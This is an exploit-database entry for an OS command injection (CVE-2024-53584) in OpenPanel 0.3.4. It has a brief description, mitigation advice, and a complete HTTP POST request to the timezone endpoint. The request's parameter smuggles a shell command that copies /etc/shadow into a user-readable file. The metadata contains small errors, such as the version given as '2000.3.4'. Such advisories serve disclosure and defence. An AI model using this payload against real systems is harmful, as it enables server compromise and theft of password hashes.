OpenPanel 0.3.4 - OS Command Injection

vendor:

OpenPanel

by:

Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee

8.1

CVSS

CRITICAL

OS Command Injection

CWE

Product Name: OpenPanel

Affected Version From: 2000.3.4

Affected Version To: 2000.3.4

Patch Exists: NO

Related CWE: CVE-2024-53584

CPE: a:openpanel:openpanel:0.3.4

Metasploit:

Other Scripts:

Platforms Tested: macOS

2024

OpenPanel 0.3.4 – OS Command Injection

The OpenPanel version 0.3.4 is vulnerable to OS command injection. An attacker can exploit this vulnerability by injecting a malicious command through the 'timezone' parameter in the HTTP POST request. This can lead to arbitrary command execution on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user inputs before processing them to prevent command injections. Additionally, limiting the privileges of the web server user can also help reduce the impact of such attacks.

Source

Exploit-DB raw data:

# Exploit Title: OpenPanel 0.3.4 - OS Command Injection 
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53584

POST /server/timezone HTTP/2
Host: demo.openpanel.org:2083
Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/server/timezone
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt